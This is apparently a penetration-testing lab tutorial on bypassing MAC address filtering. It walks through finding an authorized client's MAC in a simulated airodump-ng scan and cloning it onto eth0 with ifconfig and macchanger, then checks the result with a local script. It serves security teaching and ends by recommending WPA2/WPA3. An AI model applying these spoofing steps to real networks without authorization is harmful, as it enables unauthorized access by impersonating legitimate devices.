Introduction
MAC address filtering is a network security method where a router or access point is configured to accept connections only from devices with specific MAC addresses. While it can deter casual intruders, it is not a robust security measure because MAC addresses can be easily changed, or "spoofed."
In this lab, you will learn how to bypass MAC address filtering. You will first identify the MAC address of an already authorized client by inspecting a network scan, and then you will use the macchanger tool to change your own network interface's MAC address to match the authorized one. This process demonstrates a fundamental technique in network penetration testing and highlights the importance of using stronger security protocols like WPA2/WPA3.
Identify an Authorized Client's MAC from an airodump-ng Scan
In this step, your goal is to find the MAC address of a device that is already authorized to connect to the target network. In a real-world scenario, you would use a tool like airodump-ng to capture live network traffic. For this lab, we have provided a pre-captured scan file that simulates this process.
The scan results are saved in a CSV (Comma-Separated Values) file. Let's examine this file to find the necessary information. The file is located at ~/project/scans/network-scan-01.csv.
Use the cat command to display the contents of the file:
cat ~/project/scans/network-scan-01.csv
You will see output similar to this:
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, ## beacons, ## IV, LAN IP, id-length, ESSID, Key,Station MAC, First time seen, Last time seen, Power, ## packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2023-10-27 10:00:00, 2023-10-27 10:05:00, 6, 54, WPA2, CCMP, PSK, -50, 100, 50, 192.168.1.1, 10, FilteredNet,,AA:BB:CC:DD:EE:FF, 2023-10-27 10:01:00, 2023-10-27 10:04:50, -45, 1234, 00:11:22:33:44:55,
In this output, look for the Station MAC column. This column lists the MAC addresses of client devices connected to the network. The MAC address we need to clone is AA:BB:CC:DD:EE:FF. Take note of this address for the next steps.
Disable Your Wireless Interface with ifconfig
In this step, you will prepare your network interface for the MAC address change. Before you can modify the MAC address, the interface must be temporarily disabled. We will use the ifconfig command for this, which is a classic tool for network interface configuration.
First, let's identify your network interface and view its current MAC address. In this lab environment, we will use the eth0 interface.
Run the following command to see the details of eth0:
ifconfig eth0
The output will look something like this. Note the ether field, which shows the current hardware MAC address.
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.2 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:ac:11:00:02 txqueuelen 0 (Ethernet)
RX packets 8 bytes 696 (696.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Now, disable the eth0 interface using the down argument. You need sudo privileges to modify network interface states.
sudo ifconfig eth0 down
This command will not produce any output if successful. You can verify that the interface is down by running ifconfig eth0 again; you will notice the UP flag is gone from the first line.
Clone the Authorized MAC Address using macchanger --mac
In this step, you will use the macchanger utility to change your interface's MAC address to the one you identified earlier. With the network interface disabled, you can now safely modify its properties.
The macchanger tool allows you to view and set the MAC address of a network interface. We will use the --mac option to set a specific address.
Use the following command to change the MAC address of eth0 to AA:BB:CC:DD:EE:FF. Remember to use sudo as this is a privileged operation.
sudo macchanger --mac AA:BB:CC:DD:EE:FF eth0
After running the command, macchanger will report the changes. The output should look like this:
Current MAC: 02:42:ac:11:00:02 (Unknown)
Permanent MAC: 02:42:ac:11:00:02 (Unknown)
New MAC: aa:bb:cc:dd:ee:ff (UNKNOWN)
This output confirms that your MAC address has been successfully spoofed. The Permanent MAC is the original hardware address, while the New MAC is the one currently active on the interface.
Re-enable Your Wireless Interface with ifconfig
In this step, you will bring the network interface back online with its new MAC address. Once the MAC address has been changed, the interface must be re-enabled to apply the changes and allow it to communicate on the network.
Use the ifconfig command with the up argument to re-enable the eth0 interface:
sudo ifconfig eth0 up
This command should not produce any output. To confirm that the interface is up and has the new MAC address, run ifconfig eth0 one more time:
ifconfig eth0
Examine the output. You should see that the ether field now displays your new, spoofed MAC address, and the UP flag has returned to the first line.
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.2 netmask 255.255.0.0 broadcast 172.17.255.255
ether aa:bb:cc:dd:ee:ff txqueuelen 0 (Ethernet)
RX packets 8 bytes 696 (696.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Your interface is now active and impersonating the authorized device.
Verify Your Ability to Connect to the Filtered Network
In this final step, you will verify that your actions were successful. In a real-world scenario, you would now attempt to connect to the MAC-filtered wireless network. Since your device's MAC address now matches one on the network's allow list, the connection would be accepted.
Because we are in a simulated environment, we can't connect to a real Wi-Fi network. Instead, we will run a local script to check if the MAC address of eth0 is correctly set to the target address.
First, create a small shell script to perform this check. Use the nano editor to create a file named check_connection.sh:
nano check_connection.sh
Now, copy and paste the following script content into the nano editor:
#!/bin/bash
CURRENT_MAC=$(ip addr show eth0 | grep 'link/ether' | awk '{print $2}' | tr '[:lower:]' '[:upper:]')
TARGET_MAC="AA:BB:CC:DD:EE:FF"
if [ "$CURRENT_MAC" == "$TARGET_MAC" ]; then
echo "Connection successful! Your device is now authorized on the network."
echo "Current MAC: $CURRENT_MAC"
else
echo "Connection failed. Your MAC address does not match an authorized device."
echo "Current MAC: $CURRENT_MAC"
echo "Expected MAC: $TARGET_MAC"
fi
Save the file and exit nano by pressing Ctrl+X, then Y, and then Enter.
Next, make the script executable:
chmod +x check_connection.sh
Finally, run the script to verify your connection status:
./check_connection.sh
If you have followed all the steps correctly, you will see the success message:
Connection successful! Your device is now authorized on the network.
Current MAC: AA:BB:CC:DD:EE:FF
This confirms that you have successfully spoofed the MAC address.
Summary
In this lab, you have successfully demonstrated how to bypass MAC address filtering on a network. You have learned a complete, step-by-step process that is fundamental to network security testing.
You accomplished this by:
- Identifying an authorized client's MAC address from a simulated network scan.
- Disabling your network interface using
ifconfig. - Cloning the authorized MAC address onto your interface with
macchanger. - Re-enabling the network interface to apply the new address.
- Verifying that your new MAC address would grant you access.
The key takeaway is that MAC address filtering is a form of "security through obscurity" and should not be the only line of defense for a wireless network. For robust security, always use strong encryption protocols like WPA2 or WPA3 with a complex, unique password.